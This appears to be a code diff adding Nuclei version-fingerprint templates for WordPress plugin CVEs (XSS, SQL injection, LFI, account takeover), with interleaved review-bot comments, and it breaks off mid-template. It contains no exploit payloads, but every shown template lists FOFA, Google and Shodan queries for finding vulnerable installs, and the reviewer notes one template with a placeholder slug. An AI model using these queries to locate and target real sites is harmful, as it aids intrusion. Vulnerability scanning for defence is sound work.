+++ b/poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759
+
+info:
+ name: >
+ Photo Video Store <= 21.07 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 21.07. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/202c22f1-48ce-4724-be5f-dece2a6f9adb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53782
+ metadata:
+ fofa-query: "wp-content/plugins/photo-video-store/"
+ google-query: inurl:"/wp-content/plugins/photo-video-store/"
+ shodan-query: 'vuln:CVE-2024-53782'
+ tags: cve,wordpress,wp-plugin,photo-video-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photo-video-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "photo-video-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 21.07')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml b/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml
new file mode 100644
index 0000000000..de38bf426d
--- /dev/null
+++ b/poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51
+
+info:
+ name: >
+ Ni WooCommerce Cost Of Goods <= 3.2.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Ni WooCommerce Cost Of Goods plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68846ab2-684c-40ad-8a91-0b7d9de1ecde?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-53783
+ metadata:
+ fofa-query: "wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ google-query: inurl:"/wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ shodan-query: 'vuln:CVE-2024-53783'
+ tags: cve,wordpress,wp-plugin,ni-woocommerce-cost-of-goods,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-cost-of-goods/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ni-woocommerce-cost-of-goods"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml b/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml
new file mode 100644
index 0000000000..e43be52456
--- /dev/null
+++ b/poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684
+
+info:
+ name: >
+ Smart Marketing SMS and Newsletters Forms <= 5.0.9 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Smart Marketing SMS and Newsletters Forms plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6125a734-c185-4a97-a4fe-a739aa20de13?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53784
+ metadata:
+ fofa-query: "wp-content/plugins/smart-marketing-for-wp/"
+ google-query: inurl:"/wp-content/plugins/smart-marketing-for-wp/"
+ shodan-query: 'vuln:CVE-2024-53784'
+ tags: cve,wordpress,wp-plugin,smart-marketing-for-wp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-marketing-for-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-marketing-for-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml b/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml
new file mode 100644
index 0000000000..575b74a2ff
--- /dev/null
+++ b/poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207
+
+info:
+ name: >
+ Chatter <= 1.0.1 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Chatter plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2c6349-9444-4cea-90ae-f396ae92f85a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53785
+ metadata:
+ fofa-query: "wp-content/plugins/chatter/"
+ google-query: inurl:"/wp-content/plugins/chatter/"
+ shodan-query: 'vuln:CVE-2024-53785'
+ tags: cve,wordpress,wp-plugin,chatter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/chatter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "chatter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml b/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
new file mode 100644
index 0000000000..a82e876f3e
--- /dev/null
+++ b/poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53786
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:CVE-2024-53786'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
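Review bot: `redirects: true` with `max-redirects: 3` follows a redirect to any host, so the `readme.txt` that gets version-matched may be served by a different site than the one being assessed, and the finding would then be attributed to the wrong asset. Limiting the request to same-host redirects avoids that: replace `redirects: true` with `host-redirects: true`. Every template added in this diff uses the same request block.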
diff --git a/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml b/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml
new file mode 100644
index 0000000000..7dfe946aaa
--- /dev/null
+++ b/poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a
+
+info:
+ name: >
+ Random Banner <= 4.2.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Random Banner plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/32369351-ddae-452f-b286-6478deab5a97?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53787
+ metadata:
+ fofa-query: "wp-content/plugins/random-banner/"
+ google-query: inurl:"/wp-content/plugins/random-banner/"
+ shodan-query: 'vuln:CVE-2024-53787'
+ tags: cve,wordpress,wp-plugin,random-banner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/random-banner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "random-banner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.9')
\ No newline at end of file
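Review bot: `name: >` and `description: >` use a folded scalar with default chomping, so both values end in a newline that carries through into result output and reports. `name: >-` and `description: >-` strip it, and a one-line name could simply be a quoted string. The other templates in this diff are written the same way.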
diff --git a/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml b/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml
new file mode 100644
index 0000000000..46e063cd99
--- /dev/null
+++ b/poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3
+
+info:
+ name: >
+ WordPress Portfolio Builder – Portfolio Gallery <= 1.1.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WordPress Portfolio Builder – Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25626f3-d9a9-4aad-8f5f-45f72d0711e1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-53788
+ metadata:
+ fofa-query: "wp-content/plugins/uber-grid/"
+ google-query: inurl:"/wp-content/plugins/uber-grid/"
+ shodan-query: 'vuln:CVE-2024-53788'
+ tags: cve,wordpress,wp-plugin,uber-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/uber-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "uber-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.7')
\ No newline at end of file
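Review bot: The two `extractors` entries are identical apart from `internal: true`, and nothing explains why both are kept, so the second reads like a copy-paste leftover. As far as I can tell the internal one supplies `version` to the `compare_versions` matcher and the other only prints the detected version in results. A comment above each would make that explicit, e.g. `# internal: feeds the dsl matcher below` and `# reported: shows the detected version in output`. The pattern repeats in every template in this diff.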
diff --git a/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml b/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml
new file mode 100644
index 0000000000..55c696af83
--- /dev/null
+++ b/poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118
+
+info:
+ name: >
+ Advanced What should we write next about <= 1.0.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Advanced What should we write next about plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9b09f4de-f67d-4d15-a3e3-0cc78cfe7fe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53789
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-what-should-we-write-about-next/"
+ google-query: inurl:"/wp-content/plugins/advanced-what-should-we-write-about-next/"
+ shodan-query: 'vuln:CVE-2024-53789'
+ tags: cve,wordpress,wp-plugin,advanced-what-should-we-write-about-next,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-what-should-we-write-about-next/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-what-should-we-write-about-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
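Review bot: The `Stable tag` regex, used in both extractors, requires exactly one space after the colon, so a readme that uses a tab or several spaces yields no `version` and an affected install goes unreported. I would allow any whitespace there: `- '(?mi)Stable tag:\s*([0-9.]+)'`, single-quoted so `\s` is not read as a YAML escape. The same pattern is used by all templates in this diff.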
diff --git a/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml b/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
new file mode 100644
index 0000000000..a93a6d8a8b
--- /dev/null
+++ b/poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-53790
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53790'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
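Review bot: The `word` matcher looks for the lowercase slug `lenxel-core` in the body of `readme.txt`, but a plugin readme normally carries the display name rather than the directory slug, and word matching is case-sensitive by default. Under `matchers-condition: and` that can suppress a result on an affected install. The request path already pins the plugin, so this matcher could be dropped, or at least given `case-insensitive: true`. The same slug-in-body check is used throughout this diff, e.g. `chatter` in CVE-2024-53785 and `uber-grid` in CVE-2024-53788.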
diff --git a/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml b/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml
new file mode 100644
index 0000000000..fb4e5dde91
--- /dev/null
+++ b/poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48086577-09fc-4406-b13f-2091b50d1719?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53791
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53791'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
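Review bot: Nothing in the template tells the reader that a match is a version fingerprint only. The single GET reads `Stable tag` from `readme.txt` and never exercises the affected functionality, which the description says needs contributor-level access. I would state that where triage will see it, for example a comment above `http:` such as `# Version fingerprint only: reports installs whose readme declares <= 1.1; confirm the installed plugin version before remediation`. The same caveat applies to the other templates in this diff.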
diff --git a/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml b/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml
new file mode 100644
index 0000000000..8af345c3d7
--- /dev/null
+++ b/poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2
+
+info:
+ name: >
+ Watu Quiz <= 3.4.1.2 - Authenticated (Contributor+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Watu Quiz plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.4.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3aa8d64-a0d1-49ad-ad92-e2a2bf066fe1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-53792
+ metadata:
+ fofa-query: "wp-content/plugins/watu/"
+ google-query: inurl:"/wp-content/plugins/watu/"
+ shodan-query: 'vuln:CVE-2024-53792'
+ tags: cve,wordpress,wp-plugin,watu,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/watu/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "watu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml b/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml
new file mode 100644
index 0000000000..94d7023254
--- /dev/null
+++ b/poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6
+
+info:
+ name: >
+ eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection
+ author: topscoder
+ severity: medium
+ description: >
+ The eDoc Easy Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.29. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject arbitrary SQL queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53793
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:CVE-2024-53793'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
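Review bot: The plugin slug is the literal `Plugin` in `path`, `fofa-query`, `google-query`, `tags` and the `word` matcher, which looks like an unfilled placeholder rather than the directory of eDoc Easy Tables. As written the request goes to `{{BaseURL}}/wp-content/plugins/Plugin/readme.txt`, so an affected install would not be found, and the word `Plugin` would match almost any readme if that path did exist. The slug should be taken from the referenced advisory and substituted in all five places, e.g. `- "{{BaseURL}}/wp-content/plugins/<plugin-slug>/readme.txt"`.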
diff --git a/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml b/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml
new file mode 100644
index 0000000000..cf7e975a44
--- /dev/null
+++ b/poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86
+
+info:
+ name: >
+ REST API TO MiniProgram <= 4.7.1 - Unauthenticated Arbitrary User Email Update and Privilege Escalation via Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+ The REST API TO MiniProgram plugin for WordPress is vulnerable to privilege escalation via account takeovr in all versions up to, and including, 4.7.1 via the updateUserInfo() due to missing validation on the 'openid' user controlled key that determines what user will be updated. This makes it possible for unauthenticated attackers to update arbitrary user's accounts, including their email to a @weixin.com email, which can the be leveraged to reset the password of the user's account, including administrators.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b53066d3-2ff3-4460-896a-facd77455914?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-8485
+ metadata:
+ fofa-query: "wp-content/plugins/rest-api-to-miniprogram/"
+ google-query: inurl:"/wp-content/plugins/rest-api-to-miniprogram/"
+ shodan-query: 'vuln:CVE-2024-8485'
+ tags: cve,wordpress,wp-plugin,rest-api-to-miniprogram,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rest-api-to-miniprogram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
